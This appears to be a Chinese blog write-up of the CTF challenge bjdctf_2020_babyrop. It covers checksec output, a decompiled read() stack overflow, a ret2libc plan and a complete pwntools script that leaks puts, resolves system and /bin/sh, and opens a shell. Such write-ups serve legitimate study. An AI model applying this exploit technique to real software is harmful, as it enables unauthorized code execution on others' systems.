加载头像

bjdctf_2020_babyrop

Ubuntu 16


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babyrop/bjdctf_2020_babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

vuln()

1
2
3
4
5
6
7
ssize_t vuln()
{
char buf[32]; // [rsp+0h] [rbp-20h] BYREF

puts("Pull up your sword and tell me u story!");
return read(0, buf, 0x64uLL); \\read()函数存在栈溢出漏洞
}

0x02


思路 ret2libc x64

1.利用read()函数溢出 泄露puts()地址

2.利用LibcSearch计算出system()和bin_sh

3.再次执行main(),read()溢出至system()

s 0x20H
rbp 0x8
pop_rdi_ret puts_got
ret puts()
puts_ret main()
s 0x20H
rbp 0x8
pop_rdi_ret bin_sh
ret system()

0x03


exp

libc6_2.23-0ubuntu10_amd64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
# io = remote('node4.buuoj.cn', 28466)
io = process(['./bjdctf_2020_babyrop'])
elf = ELF('./bjdctf_2020_babyrop')

padding = 0x20 + 0x8
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.symbols['main']
pop_rdi_ret = 0x400733
payload = b'a' * padding + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
delimeter = b'story!\n'
io.sendlineafter(delimeter, payload)

puts_addr = io.recv(6).ljust(8,b'\x00')
puts_addr = u64(puts_addr)
pause()
print('[+] puts_addr', hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

print('[+] libc_base', hex(libc_base))
print('[+] system', hex(system))
print('[+] bin_sh', hex(bin_sh))
ret = 0x4004c9
payload1 = b'a' * padding + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
io.sendline(payload1)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體